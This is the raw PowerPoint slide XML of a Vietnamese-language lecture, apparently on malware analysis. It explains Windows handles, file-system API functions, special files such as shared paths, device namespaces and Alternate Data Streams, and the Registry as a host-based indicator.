              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Handles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateWindowEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>DestroyWindow</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38422979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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>xử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lý</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thống</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ReadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>MapViewOfFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>biệt</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Shared files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Bắt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\ServerName\share</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> \\?\ServerName\share </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> qua Namespaces (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>WinObj.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>\Device\Hardisk0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>\Device\Harddisk0\Partition0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bổ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> sung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (Alternate Data Stream – ADS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32574838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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Thanh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> HĐH -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> host-based indicator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hữu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>năng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Thanh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> chia 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gốc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: root key (HKEY) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> con (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>subkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (key): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (value entry): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cặp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
